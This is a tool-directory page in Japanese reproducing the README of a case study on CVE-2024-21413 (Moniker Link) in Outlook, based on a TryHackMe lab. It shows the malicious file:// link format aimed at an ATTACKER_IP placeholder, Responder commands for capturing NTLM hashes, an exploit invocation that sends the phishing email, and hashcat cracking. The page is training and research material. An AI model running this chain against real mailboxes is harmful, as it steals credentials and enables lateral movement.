Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Estudo-de-Caso-CVE-2024-21413 — CVE-2024-21413のケーススタディです。TryHackMeのMoniker Link (CVE-2024-21413) のルームをパラメータとして使用しています。exploitにはclaude codeで編集を加えました。 | Kitploit
ツール/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
パスワードクラッキング脆弱性分析エクスプロイト横移動フィッシングCTF学習と教育メールセキュリティラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

CVE-2024-21413のケーススタディです。TryHackMeのMoniker Link (CVE-2024-21413) のルームをパラメータとして使用しています。exploitにはclaude codeで編集を加えました。

リポジトリを見る
235ヶ月前未レビュー

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + NTLM 資格情報の漏えい

⚠️ 法的免責事項: このリポジトリは、教育およびセキュリティ研究のみを目的としています。すべてのデモは、管理された隔離環境で実施されました。明示的な許可なくシステムに対してこれらの技術を使用することは、違法かつ非倫理的です。


📋 目次

  • 概要
  • 脆弱性の仕組み
  • ラボ環境
  • ステップバイステップのデモ
  • エクスプロイトスクリプト
  • 攻撃ダイアグラム
  • 緩和策と防御
  • CVE 詳細分析
  • 参考情報

🔍 概要

項目詳細
CVECVE-2024-21413
公表日2024年2月13日 (Patch Tuesday)
CVSS スコア9.8 (緊急)
製品Microsoft Outlook
種別RCE + 資格情報漏えい (NTLM ハッシュ)
攻撃ベクトルネットワーク / 電子メール (事前認証なし)
ユーザー操作ユーザーの操作が必要 (リンクをクリック)
別名Moniker Link

CVE-2024-21413 は Microsoft Outlook における重大な脆弱性であり、攻撃者に以下を可能にします:

  1. NTLM 資格情報を漏えいさせる — 自動 SMB 認証を強制することで、被害者の資格情報を漏えいさせる
  2. リモートでコードを実行する — 電子メール内の悪意のあるリンクを通じて、標的マシン上でコードを実行する

「Moniker Link」という名前は、文字列でオブジェクトを参照する Windows のメカニズムである Component Object Model (COM) Moniker を悪用して、Outlook の file:// リンクに対する保護を回避することに由来します。


🧠 脆弱性の仕組み

問題: Protected View のバイパス

通常、Outlook はネットワークリソースを指す file:// リンクをブロックし、セキュリティ警告 (Protected View) を表示します。この欠陥は、Outlook が Moniker の区切り文字である ! 文字を含む URL を処理する方法にあります。

悪用方法

悪意のあるリンクは次の形式です:

file:///\\ATTACKER_IP\share\!something

! 文字により、Outlook のパーサーは URL を COM Moniker への参照として解釈し、通常のセキュリティチェックをバイパスします。結果は以下のとおりです:

  • 被害者のマシンは、攻撃者のサーバーに対して SMB 経由で自動的に認証を試みます
  • この認証中に、被害者の NTLM ハッシュが送信されます
  • このハッシュは Pass-the-Hash 攻撃に使用したり、オフラインで解読したりできます

簡略化したフロー

Atacante envia e-mail → Vítima clica no link → Outlook processa URL com "!"
→ Bypass da Protected View → Conexão SMB automática → Hash NTLM capturado

🖥️ ラボ環境

このケーススタディを安全に再現するには:

マシンOS役割
攻撃者Kali LinuxSMB リスナー + エクスプロイト
標的脆弱な Outlook を搭載した Windows 10/11被害者

重要: 隔離されたネットワーク (VirtualBox/VMware の NAT または Host-Only) を使用してください。実際のネットワークでは実行しないでください。

必要なツール

# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder

# Python 3 — para rodar o exploit
python3 --version

# Verificar conectividade entre as máquinas
ping <IP_ALVO>

🚀 ステップバイステップのデモ

ステップ 1 — 攻撃者マシンの IP を特定する

ip a | grep inet
# Anote o IP da interface que se comunica com o alvo (ex: 192.168.56.10)

ステップ 2 — Responder を起動する

Responder は、NTLM 認証ハッシュをキャプチャする偽の SMB サーバーを作成します。

sudo responder -I eth0 -v
# Substitua eth0 pela sua interface de rede

期待される出力:

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash     : usuario::DESKTOP-ALVO:...

ステップ 3 — エクスプロイトを実行する

python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_SERVIDOR_EMAIL> \
  --attacker-ip 192.168.56.10

ステップ 4 — 被害者がリンクをクリックするのを待つ

被害者が電子メールを開いてリンクをクリックすると、Responder は自動的に NTLM ハッシュをキャプチャします。このハッシュは次のように使用できます:

  • 分析 — 侵害されたアカウントを特定する
  • Pass-the-Hash に使用 — ネットワーク内での横移動認証に使用する
  • Hashcat/John に送信 — オフラインでの解読を試みる:
hashcat -m 5600 hash.txt wordlist.txt

🐍 エクスプロイトスクリプト

完全なコメント付きスクリプトについては、exploit.py ファイルを参照してください。


📊 攻撃ダイアグラム

攻撃の完全なフローのインタラクティブな可視化については、diagrama-ataque.html ファイルを参照してください。


🛡️ 緩和策と防御

緩和策と防御の完全なガイドについては、MITIGACAO.md ファイルを参照してください。


📄 CVE 詳細分析

脆弱性の詳細な技術分析については、CVE-BREAKDOWN.md ファイルを参照してください。


📚 参考情報

  • Microsoft Security Advisory — CVE-2024-21413
  • Morphisec — Moniker Link Research
  • TryHackMe — Moniker Link Room
  • Responder Tool — GitHub
  • NTLM Authentication — Microsoft Docs
  • NVD — CVE-2024-21413

👤 著者

このケーススタディは、TryHackMe による実践的な攻撃的セキュリティトレーニングの一環として開発されました。

このプロジェクトは、責任ある開示 (responsible disclosure) と倫理的ハッキング (ethical hacking) の原則に従っています。ここに記載されているすべてのコンテンツは、教育とセキュリティ体制の向上を目的としています。

ツールをダウンロード